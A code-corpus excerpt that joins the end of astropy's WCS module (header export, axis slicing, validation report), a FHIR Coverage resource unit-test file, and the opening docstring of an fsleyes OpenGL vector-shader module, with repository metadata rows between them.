def sip_foc2pix(self, *args):
if self.sip is None:
if len(args) == 2:
return args[0]
elif len(args) == 3:
return args[:2]
else:
raise TypeError("Wrong number of arguments")
return self._array_converter(self.sip.foc2pix, None, *args)
sip_foc2pix.__doc__ = """
Convert focal plane coordinates to pixel coordinates using the
`SIP`_ polynomial distortion convention.
FITS WCS `distortion paper`_ table lookup distortion
correction is not applied, even if that information existed in
the FITS file that initialized this `~astropy.wcs.WCS` object.
Parameters
----------
{}
Returns
-------
{}
Raises
------
MemoryError
Memory allocation failed.
ValueError
Invalid coordinate transformation parameters.
""".format(docstrings.TWO_OR_MORE_ARGS('2', 8),
docstrings.RETURNS('pixel coordinates', 8))
def to_fits(self, relax=False, key=None):
"""
Generate an `astropy.io.fits.HDUList` object with all of the
information stored in this object. This should be logically identical
to the input FITS file, but it will be normalized in a number of ways.
See `to_header` for some warnings about the output produced.
Parameters
----------
relax : bool or int, optional
Degree of permissiveness:
- `False` (default): Write all extensions that are
considered to be safe and recommended.
- `True`: Write all recognized informal extensions of the
WCS standard.
- `int`: a bit field selecting specific extensions to
write. See :ref:`relaxwrite` for details.
key : str
The name of a particular WCS transform to use. This may be
either ``' '`` or ``'A'``-``'Z'`` and corresponds to the ``"a"``
part of the ``CTYPEia`` cards.
Returns
-------
hdulist : `astropy.io.fits.HDUList`
"""
header = self.to_header(relax=relax, key=key)
hdu = fits.PrimaryHDU(header=header)
hdulist = fits.HDUList(hdu)
self._write_det2im(hdulist)
self._write_distortion_kw(hdulist)
return hdulist
def to_header(self, relax=None, key=None):
"""Generate an `astropy.io.fits.Header` object with the basic WCS
and SIP information stored in this object. This should be
logically identical to the input FITS file, but it will be
normalized in a number of ways.
.. warning::
This function does not write out FITS WCS `distortion
paper`_ information, since that requires multiple FITS
header data units. To get a full representation of
everything in this object, use `to_fits`.
Parameters
----------
relax : bool or int, optional
Degree of permissiveness:
- `False` (default): Write all extensions that are
considered to be safe and recommended.
- `True`: Write all recognized informal extensions of the
WCS standard.
- `int`: a bit field selecting specific extensions to
write. See :ref:`relaxwrite` for details.
If the ``relax`` keyword argument is not given and any
keywords were omitted from the output, an
`~astropy.utils.exceptions.AstropyWarning` is displayed.
To override this, explicitly pass a value to ``relax``.
key : str
The name of a particular WCS transform to use. This may be
either ``' '`` or ``'A'``-``'Z'`` and corresponds to the ``"a"``
part of the ``CTYPEia`` cards.
Returns
-------
header : `astropy.io.fits.Header`
Notes
-----
The output header will almost certainly differ from the input in a
number of respects:
1. The output header only contains WCS-related keywords. In
particular, it does not contain syntactically-required
keywords such as ``SIMPLE``, ``NAXIS``, ``BITPIX``, or
``END``.
2. Deprecated (e.g. ``CROTAn``) or non-standard usage will
be translated to standard (this is partially dependent on
whether ``fix`` was applied).
3. Quantities will be converted to the units used internally,
basically SI with the addition of degrees.
4. Floating-point quantities may be given to a different decimal
precision.
5. Elements of the ``PCi_j`` matrix will be written if and
only if they differ from the unit matrix. Thus, if the
matrix is unity then no elements will be written.
6. Additional keywords such as ``WCSAXES``, ``CUNITia``,
``LONPOLEa`` and ``LATPOLEa`` may appear.
7. The original keycomments will be lost, although
`to_header` tries hard to write meaningful comments.
8. Keyword order may be changed.
"""
# default precision for numerical WCS keywords
precision = WCSHDO_P14
display_warning = False
if relax is None:
display_warning = True
relax = False
if relax not in (True, False):
do_sip = relax & WCSHDO_SIP
relax &= ~WCSHDO_SIP
else:
do_sip = relax
relax = WCSHDO_all if relax is True else WCSHDO_safe
relax = precision | relax
if self.wcs is not None:
if key is not None:
orig_key = self.wcs.alt
self.wcs.alt = key
header_string = self.wcs.to_header(relax)
header = fits.Header.fromstring(header_string)
keys_to_remove = ["", " ", "COMMENT"]
for kw in keys_to_remove:
if kw in header:
del header[kw]
else:
header = fits.Header()
if do_sip and self.sip is not None:
if self.wcs is not None and any(not ctyp.endswith('-SIP') for ctyp in self.wcs.ctype):
self._fix_ctype(header, add_sip=True)
for kw, val in self._write_sip_kw().items():
header[kw] = val
if not do_sip and self.wcs is not None and any(self.wcs.ctype) and self.sip is not None:
# This is called when relax is not False or WCSHDO_SIP
# The default case of ``relax=None`` is handled further in the code.
header = self._fix_ctype(header, add_sip=False)
if display_warning:
full_header = self.to_header(relax=True, key=key)
missing_keys = []
for kw, val in full_header.items():
if kw not in header:
missing_keys.append(kw)
if len(missing_keys):
warnings.warn(
"Some non-standard WCS keywords were excluded: {} "
"Use the ``relax`` kwarg to control this.".format(
', '.join(missing_keys)),
AstropyWarning)
# called when ``relax=None``
# This is different from the case of ``relax=False``.
if any(self.wcs.ctype) and self.sip is not None:
header = self._fix_ctype(header, add_sip=False, log_message=False)
# Finally reset the key. This must be called after ``_fix_ctype``.
if key is not None:
self.wcs.alt = orig_key
return header
def _fix_ctype(self, header, add_sip=True, log_message=True):
"""
Parameters
----------
header : `~astropy.io.fits.Header`
FITS header.
add_sip : bool
Flag indicating whether "-SIP" should be added or removed from CTYPE keywords.
Remove "-SIP" from CTYPE when writing out a header with relax=False.
This needs to be done outside ``to_header`` because ``to_header`` runs
twice when ``relax=False`` and the second time ``relax`` is set to ``True``
to display the missing keywords.
If the user requested SIP distortion to be written out add "-SIP" to
CTYPE if it is missing.
"""
_add_sip_to_ctype = """
Inconsistent SIP distortion information is present in the current WCS:
SIP coefficients were detected, but CTYPE is missing "-SIP" suffix,
therefore the current WCS is internally inconsistent.
Because relax has been set to True, the resulting output WCS will have
"-SIP" appended to CTYPE in order to make the header internally consistent.
However, this may produce incorrect astrometry in the output WCS, if
in fact the current WCS is already distortion-corrected.
Therefore, if current WCS is already distortion-corrected (eg, drizzled)
then SIP distortion components should not apply. In that case, for a WCS
that is already distortion-corrected, please remove the SIP coefficients
from the header.
"""
if log_message:
if add_sip:
log.info(_add_sip_to_ctype)
for i in range(1, self.naxis+1):
# strip() must be called here to cover the case of alt key= " "
kw = f'CTYPE{i}{self.wcs.alt}'.strip()
if kw in header:
if add_sip:
val = header[kw].strip("-SIP") + "-SIP"
else:
val = header[kw].strip("-SIP")
header[kw] = val
else:
continue
return header
def to_header_string(self, relax=None):
"""
Identical to `to_header`, but returns a string containing the
header cards.
"""
return str(self.to_header(relax))
def footprint_to_file(self, filename='footprint.reg', color='green',
width=2, coordsys=None):
"""
Writes out a `ds9`_ style regions file. It can be loaded
directly by `ds9`_.
Parameters
----------
filename : str, optional
Output file name - default is ``'footprint.reg'``
color : str, optional
Color to use when plotting the line.
width : int, optional
Width of the region line.
coordsys : str, optional
Coordinate system. If not specified (default), the ``radesys``
value is used. For all possible values, see
http://ds9.si.edu/doc/ref/region.html#RegionFileFormat
"""
comments = ('# Region file format: DS9 version 4.0 \n'
'# global color=green font="helvetica 12 bold '
'select=1 highlite=1 edit=1 move=1 delete=1 '
'include=1 fixed=0 source\n')
coordsys = coordsys or self.wcs.radesys
if coordsys not in ('PHYSICAL', 'IMAGE', 'FK4', 'B1950', 'FK5',
'J2000', 'GALACTIC', 'ECLIPTIC', 'ICRS', 'LINEAR',
'AMPLIFIER', 'DETECTOR'):
raise ValueError("Coordinate system '{}' is not supported. A valid"
" one can be given with the 'coordsys' argument."
.format(coordsys))
with open(filename, mode='w') as f:
f.write(comments)
f.write(f'{coordsys}\n')
f.write('polygon(')
ftpr = self.calc_footprint()
if ftpr is not None:
ftpr.tofile(f, sep=',')
f.write(f') # color={color}, width={width:d} \n')
def _get_naxis(self, header=None):
_naxis = []
if (header is not None and
not isinstance(header, (str, bytes))):
for naxis in itertools.count(1):
try:
_naxis.append(header[f'NAXIS{naxis}'])
except KeyError:
break
if len(_naxis) == 0:
_naxis = [0, 0]
elif len(_naxis) == 1:
_naxis.append(0)
self._naxis = _naxis
def printwcs(self):
print(repr(self))
def __repr__(self):
'''
Return a short description. Simply porting the behavior from
the `printwcs()` method.
'''
description = ["WCS Keywords\n",
f"Number of WCS axes: {self.naxis!r}"]
sfmt = ' : ' + "".join(["{"+f"{i}"+"!r} " for i in range(self.naxis)])
keywords = ['CTYPE', 'CRVAL', 'CRPIX']
values = [self.wcs.ctype, self.wcs.crval, self.wcs.crpix]
for keyword, value in zip(keywords, values):
description.append(keyword+sfmt.format(*value))
if hasattr(self.wcs, 'pc'):
for i in range(self.naxis):
s = ''
for j in range(self.naxis):
s += ''.join(['PC', str(i+1), '_', str(j+1), ' '])
s += sfmt
description.append(s.format(*self.wcs.pc[i]))
s = 'CDELT' + sfmt
description.append(s.format(*self.wcs.cdelt))
elif hasattr(self.wcs, 'cd'):
for i in range(self.naxis):
s = ''
for j in range(self.naxis):
s += "".join(['CD', str(i+1), '_', str(j+1), ' '])
s += sfmt
description.append(s.format(*self.wcs.cd[i]))
description.append('NAXIS : {}'.format(' '.join(map(str, self._naxis))))
return '\n'.join(description)
def get_axis_types(self):
"""
Similar to `self.wcsprm.axis_types <astropy.wcs.Wcsprm.axis_types>`
but provides the information in a more Python-friendly format.
Returns
-------
result : list of dicts
Returns a list of dictionaries, one for each axis, each
containing attributes about the type of that axis.
Each dictionary has the following keys:
- 'coordinate_type':
- None: Non-specific coordinate type.
- 'stokes': Stokes coordinate.
- 'celestial': Celestial coordinate (including ``CUBEFACE``).
- 'spectral': Spectral coordinate.
- 'scale':
- 'linear': Linear axis.
- 'quantized': Quantized axis (``STOKES``, ``CUBEFACE``).
- 'non-linear celestial': Non-linear celestial axis.
- 'non-linear spectral': Non-linear spectral axis.
- 'logarithmic': Logarithmic axis.
- 'tabular': Tabular axis.
- 'group'
- Group number, e.g. lookup table number
- 'number'
- For celestial axes:
- 0: Longitude coordinate.
- 1: Latitude coordinate.
- 2: ``CUBEFACE`` number.
- For lookup tables:
- the axis number in a multidimensional table.
``CTYPEia`` in ``"4-3"`` form with unrecognized algorithm code will
generate an error.
"""
if self.wcs is None:
raise AttributeError(
"This WCS object does not have a wcsprm object.")
coordinate_type_map = {
0: None,
1: 'stokes',
2: 'celestial',
3: 'spectral'}
scale_map = {
0: 'linear',
1: 'quantized',
2: 'non-linear celestial',
3: 'non-linear spectral',
4: 'logarithmic',
5: 'tabular'}
result = []
for axis_type in self.wcs.axis_types:
subresult = {}
coordinate_type = (axis_type // 1000) % 10
subresult['coordinate_type'] = coordinate_type_map[coordinate_type]
scale = (axis_type // 100) % 10
subresult['scale'] = scale_map[scale]
group = (axis_type // 10) % 10
subresult['group'] = group
number = axis_type % 10
subresult['number'] = number
result.append(subresult)
return result
def __reduce__(self):
"""
Support pickling of WCS objects. This is done by serializing
to an in-memory FITS file and dumping that as a string.
"""
hdulist = self.to_fits(relax=True)
buffer = io.BytesIO()
hdulist.writeto(buffer)
return (__WCS_unpickle__,
(self.__class__, self.__dict__, buffer.getvalue(),))
def dropaxis(self, dropax):
"""
Remove an axis from the WCS.
Parameters
----------
wcs : `~astropy.wcs.WCS`
The WCS with naxis to be chopped to naxis-1
dropax : int
The index of the WCS to drop, counting from 0 (i.e., python convention,
not FITS convention)
Returns
-------
A new `~astropy.wcs.WCS` instance with one axis fewer
"""
inds = list(range(self.wcs.naxis))
inds.pop(dropax)
# axis 0 has special meaning to sub
# if wcs.wcs.ctype == ['RA','DEC','VLSR'], you want
# wcs.sub([1,2]) to get 'RA','DEC' back
return self.sub([i+1 for i in inds])
def swapaxes(self, ax0, ax1):
"""
Swap axes in a WCS.
Parameters
----------
wcs : `~astropy.wcs.WCS`
The WCS to have its axes swapped
ax0 : int
ax1 : int
The indices of the WCS to be swapped, counting from 0 (i.e., python
convention, not FITS convention)
Returns
-------
A new `~astropy.wcs.WCS` instance with the same number of axes, but two
swapped
"""
inds = list(range(self.wcs.naxis))
inds[ax0], inds[ax1] = inds[ax1], inds[ax0]
return self.sub([i+1 for i in inds])
def reorient_celestial_first(self):
"""
Reorient the WCS such that the celestial axes are first, followed by
the spectral axis, followed by any others.
Assumes at least celestial axes are present.
"""
return self.sub([WCSSUB_CELESTIAL, WCSSUB_SPECTRAL, WCSSUB_STOKES])
def slice(self, view, numpy_order=True):
"""
Slice a WCS instance using a Numpy slice. The order of the slice should
be reversed (as for the data) compared to the natural WCS order.
Parameters
----------
view : tuple
A tuple containing the same number of slices as the WCS system.
The ``step`` method, the third argument to a slice, is not
presently supported.
numpy_order : bool
Use numpy order, i.e. slice the WCS so that an identical slice
applied to a numpy array will slice the array and WCS in the same
way. If set to `False`, the WCS will be sliced in FITS order,
meaning the first slice will be applied to the *last* numpy index
but the *first* WCS axis.
Returns
-------
wcs_new : `~astropy.wcs.WCS`
A new resampled WCS axis
"""
if hasattr(view, '__len__') and len(view) > self.wcs.naxis:
raise ValueError("Must have # of slices <= # of WCS axes")
elif not hasattr(view, '__len__'): # view MUST be an iterable
view = [view]
if not all(isinstance(x, slice) for x in view):
# We need to drop some dimensions, but this may not always be
# possible with .sub due to correlated axes, so instead we use the
# generalized slicing infrastructure from astropy.wcs.wcsapi.
return SlicedFITSWCS(self, view)
# NOTE: we could in principle use SlicedFITSWCS as above for all slicing,
# but in the simple case where there are no axes dropped, we can just
# create a full WCS object with updated WCS parameters which is faster
# for this specific case and also backward-compatible.
wcs_new = self.deepcopy()
if wcs_new.sip is not None:
sip_crpix = wcs_new.sip.crpix.tolist()
for i, iview in enumerate(view):
if iview.step is not None and iview.step < 0:
raise NotImplementedError("Reversing an axis is not "
"implemented.")
if numpy_order:
wcs_index = self.wcs.naxis - 1 - i
else:
wcs_index = i
if iview.step is not None and iview.start is None:
# Slice from "None" is equivalent to slice from 0 (but one
# might want to downsample, so allow slices with
# None,None,step or None,stop,step)
iview = slice(0, iview.stop, iview.step)
if iview.start is not None:
if iview.step not in (None, 1):
crpix = self.wcs.crpix[wcs_index]
cdelt = self.wcs.cdelt[wcs_index]
# equivalently (keep this comment so you can compare eqns):
# wcs_new.wcs.crpix[wcs_index] =
# (crpix - iview.start)*iview.step + 0.5 - iview.step/2.
crp = ((crpix - iview.start - 1.)/iview.step
+ 0.5 + 1./iview.step/2.)
wcs_new.wcs.crpix[wcs_index] = crp
if wcs_new.sip is not None:
sip_crpix[wcs_index] = crp
wcs_new.wcs.cdelt[wcs_index] = cdelt * iview.step
else:
wcs_new.wcs.crpix[wcs_index] -= iview.start
if wcs_new.sip is not None:
sip_crpix[wcs_index] -= iview.start
try:
# range requires integers but the other attributes can also
# handle arbitrary values, so this needs to be in a try/except.
nitems = len(builtins.range(self._naxis[wcs_index])[iview])
except TypeError as exc:
if 'indices must be integers' not in str(exc):
raise
warnings.warn("NAXIS{} attribute is not updated because at "
"least one index ('{}') is no integer."
"".format(wcs_index, iview), AstropyUserWarning)
else:
wcs_new._naxis[wcs_index] = nitems
if wcs_new.sip is not None:
wcs_new.sip = Sip(self.sip.a, self.sip.b, self.sip.ap, self.sip.bp,
sip_crpix)
return wcs_new
def __getitem__(self, item):
# "getitem" is a shortcut for self.slice; it is very limited
# there is no obvious and unambiguous interpretation of wcs[1,2,3]
# We COULD allow wcs[1] to link to wcs.sub([2])
# (wcs[i] -> wcs.sub([i+1])
return self.slice(item)
def __iter__(self):
# Having __getitem__ makes Python think WCS is iterable. However,
# Python first checks whether __iter__ is present, so we can raise an
# exception here.
raise TypeError(f"'{self.__class__.__name__}' object is not iterable")
@property
def axis_type_names(self):
"""
World names for each coordinate axis
Returns
-------
A list of names along each axis
"""
names = list(self.wcs.cname)
types = self.wcs.ctype
for i in range(len(names)):
if len(names[i]) > 0:
continue
names[i] = types[i].split('-')[0]
return names
@property
def celestial(self):
"""
A copy of the current WCS with only the celestial axes included
"""
return self.sub([WCSSUB_CELESTIAL])
@property
def is_celestial(self):
return self.has_celestial and self.naxis == 2
@property
def has_celestial(self):
try:
return self.wcs.lng >= 0 and self.wcs.lat >= 0
except InconsistentAxisTypesError:
return False
@property
def spectral(self):
"""
A copy of the current WCS with only the spectral axes included
"""
return self.sub([WCSSUB_SPECTRAL])
@property
def is_spectral(self):
return self.has_spectral and self.naxis == 1
@property
def has_spectral(self):
try:
return self.wcs.spec >= 0
except InconsistentAxisTypesError:
return False
@property
def has_distortion(self):
"""
Returns `True` if any distortion terms are present.
"""
return (self.sip is not None or
self.cpdis1 is not None or self.cpdis2 is not None or
self.det2im1 is not None and self.det2im2 is not None)
@property
def pixel_scale_matrix(self):
try:
cdelt = np.diag(self.wcs.get_cdelt())
pc = self.wcs.get_pc()
except InconsistentAxisTypesError:
try:
# for non-celestial axes, get_cdelt doesn't work
with warnings.catch_warnings():
warnings.filterwarnings('ignore', 'cdelt will be ignored since cd is present', RuntimeWarning)
cdelt = np.dot(self.wcs.cd, np.diag(self.wcs.cdelt))
except AttributeError:
cdelt = np.diag(self.wcs.cdelt)
try:
pc = self.wcs.pc
except AttributeError:
pc = 1
pccd = np.array(np.dot(cdelt, pc))
return pccd
def footprint_contains(self, coord, **kwargs):
"""
Determines if a given SkyCoord is contained in the wcs footprint.
Parameters
----------
coord : `~astropy.coordinates.SkyCoord`
The coordinate to check if it is within the wcs coordinate.
**kwargs :
Additional arguments to pass to `~astropy.coordinates.SkyCoord.to_pixel`
Returns
-------
response : bool
True means the WCS footprint contains the coordinate, False means it does not.
"""
return coord.contained_by(self, **kwargs)
def __WCS_unpickle__(cls, dct, fits_data):
"""
Unpickles a WCS object from a serialized FITS string.
"""
self = cls.__new__(cls)
self.__dict__.update(dct)
buffer = io.BytesIO(fits_data)
hdulist = fits.open(buffer)
WCS.__init__(self, hdulist[0].header, hdulist)
return self
def find_all_wcs(header, relax=True, keysel=None, fix=True,
translate_units='',
_do_set=True):
"""
Find all the WCS transformations in the given header.
Parameters
----------
header : str or astropy.io.fits header object.
relax : bool or int, optional
Degree of permissiveness:
- `True` (default): Admit all recognized informal extensions of the
WCS standard.
- `False`: Recognize only FITS keywords defined by the
published WCS standard.
- `int`: a bit field selecting specific extensions to accept.
See :ref:`relaxread` for details.
keysel : sequence of flags, optional
A list of flags used to select the keyword types considered by
wcslib. When ``None``, only the standard image header
keywords are considered (and the underlying wcspih() C
function is called). To use binary table image array or pixel
list keywords, *keysel* must be set.
Each element in the list should be one of the following strings:
- 'image': Image header keywords
- 'binary': Binary table image array keywords
- 'pixel': Pixel list keywords
Keywords such as ``EQUIna`` or ``RFRQna`` that are common to
binary table image arrays and pixel lists (including
``WCSNna`` and ``TWCSna``) are selected by both 'binary' and
'pixel'.
fix : bool, optional
When `True` (default), call `~astropy.wcs.Wcsprm.fix` on
the resulting objects to fix any non-standard uses in the
header. `FITSFixedWarning` warnings will be emitted if any
changes were made.
translate_units : str, optional
Specify which potentially unsafe translations of non-standard
unit strings to perform. By default, performs none. See
`WCS.fix` for more information about this parameter. Only
effective when ``fix`` is `True`.
Returns
-------
wcses : list of `WCS` objects
"""
if isinstance(header, (str, bytes)):
header_string = header
elif isinstance(header, fits.Header):
header_string = header.tostring()
else:
raise TypeError(
"header must be a string or astropy.io.fits.Header object")
keysel_flags = _parse_keysel(keysel)
if isinstance(header_string, str):
header_bytes = header_string.encode('ascii')
else:
header_bytes = header_string
wcsprms = _wcs.find_all_wcs(header_bytes, relax, keysel_flags)
result = []
for wcsprm in wcsprms:
subresult = WCS(fix=False, _do_set=False)
subresult.wcs = wcsprm
result.append(subresult)
if fix:
subresult.fix(translate_units)
if _do_set:
subresult.wcs.set()
return result
def validate(source):
"""
Prints a WCS validation report for the given FITS file.
Parameters
----------
source : str path, readable file-like object or `astropy.io.fits.HDUList` object
The FITS file to validate.
Returns
-------
results : WcsValidateResults instance
The result is returned as nested lists. The first level
corresponds to the HDUs in the given file. The next level has
an entry for each WCS found in that header. The special
subclass of list will pretty-print the results as a table when
printed.
"""
class _WcsValidateWcsResult(list):
def __init__(self, key):
self._key = key
def __repr__(self):
result = [" WCS key '{}':".format(self._key or ' ')]
if len(self):
for entry in self:
for i, line in enumerate(entry.splitlines()):
if i == 0:
initial_indent = ' - '
else:
initial_indent = ' '
result.extend(
textwrap.wrap(
line,
initial_indent=initial_indent,
subsequent_indent=' '))
else:
result.append(" No issues.")
return '\n'.join(result)
class _WcsValidateHduResult(list):
def __init__(self, hdu_index, hdu_name):
self._hdu_index = hdu_index
self._hdu_name = hdu_name
list.__init__(self)
def __repr__(self):
if len(self):
if self._hdu_name:
hdu_name = f' ({self._hdu_name})'
else:
hdu_name = ''
result = [f'HDU {self._hdu_index}{hdu_name}:']
for wcs in self:
result.append(repr(wcs))
return '\n'.join(result)
return ''
class _WcsValidateResults(list):
def __repr__(self):
result = []
for hdu in self:
content = repr(hdu)
if len(content):
result.append(content)
return '\n\n'.join(result)
global __warningregistry__
if isinstance(source, fits.HDUList):
hdulist = source
else:
hdulist = fits.open(source)
results = _WcsValidateResults()
for i, hdu in enumerate(hdulist):
hdu_results = _WcsValidateHduResult(i, hdu.name)
results.append(hdu_results)
with warnings.catch_warnings(record=True) as warning_lines:
wcses = find_all_wcs(
hdu.header, relax=_wcs.WCSHDR_reject,
fix=False, _do_set=False)
for wcs in wcses:
wcs_results = _WcsValidateWcsResult(wcs.wcs.alt)
hdu_results.append(wcs_results)
try:
del __warningregistry__
except NameError:
pass
with warnings.catch_warnings(record=True) as warning_lines:
warnings.resetwarnings()
warnings.simplefilter(
"always", FITSFixedWarning, append=True)
try:
WCS(hdu.header,
key=wcs.wcs.alt or ' ',
relax=_wcs.WCSHDR_reject,
fix=True, _do_set=False)
except WcsError as e:
wcs_results.append(str(e))
wcs_results.extend([str(x.message) for x in warning_lines])
return results
| 37.723322
| 114
| 0.547266
|
b153a27a2775d55cfb9d9a6f579d077c609ff818
| 7,554
|
py
|
Python
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/coverage_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 39
|
2017-10-13T19:16:27.000Z
|
2021-09-24T16:58:21.000Z
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/coverage_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 312
|
2017-09-08T15:42:13.000Z
|
2022-03-23T18:21:40.000Z
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/coverage_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 19
|
2017-09-15T13:58:00.000Z
|
2022-02-07T18:33:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 3.0.0.11832 on 2017-03-22.
# 2017, SMART Health IT.
import io
import json
import os
import unittest
from . import coverage
from .fhirdate import FHIRDate
class CoverageTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Coverage", js["resourceType"])
return coverage.Coverage(js)
def testCoverage1(self):
inst = self.instantiate_from("coverage-example-2.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage1(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage1(inst2)
def implCoverage1(self, inst):
self.assertEqual(inst.dependent, "1")
self.assertEqual(inst.grouping.group, "WESTAIR")
self.assertEqual(inst.grouping.groupDisplay, "Western Airlines")
self.assertEqual(inst.grouping.plan, "WESTAIR")
self.assertEqual(inst.grouping.planDisplay, "Western Airlines")
self.assertEqual(inst.grouping.subPlan, "D15C9")
self.assertEqual(inst.grouping.subPlanDisplay, "Platinum")
self.assertEqual(inst.id, "7546D")
self.assertEqual(inst.identifier[0].system, "http://xyz.com/codes/identifier")
self.assertEqual(inst.identifier[0].value, "AB98761")
self.assertEqual(inst.network, "5")
self.assertEqual(inst.order, 2)
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.period.start.date, FHIRDate("2011-03-17").date)
self.assertEqual(inst.period.start.as_json(), "2011-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.subscriberId, "AB9876")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the coverage</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/v3/ActCode")
def testCoverage2(self):
inst = self.instantiate_from("coverage-example-ehic.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage2(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage2(inst2)
def implCoverage2(self, inst):
self.assertEqual(inst.id, "7547E")
self.assertEqual(inst.identifier[0].system, "http://ehic.com/insurer/123456789/member")
self.assertEqual(inst.identifier[0].value, "A123456780")
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the European Health Insurance Card</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/v3/ActCode")
def testCoverage3(self):
inst = self.instantiate_from("coverage-example-selfpay.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage3(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage3(inst2)
def implCoverage3(self, inst):
self.assertEqual(inst.id, "SP1234")
self.assertEqual(inst.identifier[0].system, "http://hospitalx.com/selfpayagreement")
self.assertEqual(inst.identifier[0].value, "SP12345678")
self.assertEqual(inst.period.end.date, FHIRDate("2012-03-17").date)
self.assertEqual(inst.period.end.as_json(), "2012-03-17")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of a Self Pay Agreement.</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "pay")
self.assertEqual(inst.type.coding[0].display, "PAY")
self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/coverage-selfpay")
def testCoverage4(self):
inst = self.instantiate_from("coverage-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Coverage instance")
self.implCoverage4(inst)
js = inst.as_json()
self.assertEqual("Coverage", js["resourceType"])
inst2 = coverage.Coverage(js)
self.implCoverage4(inst2)
def implCoverage4(self, inst):
self.assertEqual(inst.dependent, "0")
self.assertEqual(inst.grouping.classDisplay, "Silver: Family Plan spouse only")
self.assertEqual(inst.grouping.class_fhir, "SILVER")
self.assertEqual(inst.grouping.group, "CBI35")
self.assertEqual(inst.grouping.groupDisplay, "Corporate Baker's Inc. Local #35")
self.assertEqual(inst.grouping.plan, "B37FC")
self.assertEqual(inst.grouping.planDisplay, "Full Coverage: Medical, Dental, Pharmacy, Vision, EHC")
self.assertEqual(inst.grouping.subClass, "Tier2")
self.assertEqual(inst.grouping.subClassDisplay, "Low deductable, max $20 copay")
self.assertEqual(inst.grouping.subGroup, "123")
self.assertEqual(inst.grouping.subGroupDisplay, "Trainee Part-time Benefits")
self.assertEqual(inst.grouping.subPlan, "P7")
self.assertEqual(inst.grouping.subPlanDisplay, "Includes afterlife benefits")
self.assertEqual(inst.id, "9876B1")
self.assertEqual(inst.identifier[0].system, "http://benefitsinc.com/certificate")
self.assertEqual(inst.identifier[0].value, "12345")
self.assertEqual(inst.period.end.date, FHIRDate("2012-05-23").date)
self.assertEqual(inst.period.end.as_json(), "2012-05-23")
self.assertEqual(inst.period.start.date, FHIRDate("2011-05-23").date)
self.assertEqual(inst.period.start.as_json(), "2011-05-23")
self.assertEqual(inst.relationship.coding[0].code, "self")
self.assertEqual(inst.sequence, "9")
self.assertEqual(inst.status, "active")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the coverage</div>")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "EHCPOL")
self.assertEqual(inst.type.coding[0].display, "extended healthcare")
self.assertEqual(inst.type.coding[0].system, "http://hl7.org/fhir/v3/ActCode")
| 50.697987
| 157
| 0.679243
|
163b0af331fa9afffe08f52702ba018aea44269c
| 4,692
|
py
|
Python
|
fsleyes/gl/gl14/glvector_funcs.py
|
pauldmccarthy/fsleyes
|
453a6b91ec7763c39195814d635257e3766acf83
|
[
"Apache-2.0"
] | 12
|
2018-05-05T01:36:25.000Z
|
2021-09-23T20:44:08.000Z
|
fsleyes/gl/gl14/glvector_funcs.py
|
pauldmccarthy/fsleyes
|
453a6b91ec7763c39195814d635257e3766acf83
|
[
"Apache-2.0"
] | 97
|
2018-05-05T02:17:23.000Z
|
2022-03-29T14:58:42.000Z
|
fsleyes/gl/gl14/glvector_funcs.py
|
pauldmccarthy/fsleyes
|
453a6b91ec7763c39195814d635257e3766acf83
|
[
"Apache-2.0"
] | 6
|
2017-12-09T09:02:00.000Z
|
2021-03-05T18:55:13.000Z
|
#!/usr/bin/env python
#
# glvector_funcs.py - Functions used by glrgbvector_funcs and
# gllinevector_funcs.
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
"""This module contains logic for managing vertex and fragment shader programs
used for rendering :class:`.GLRGBVector` and :class:`.GLLineVector` instances.
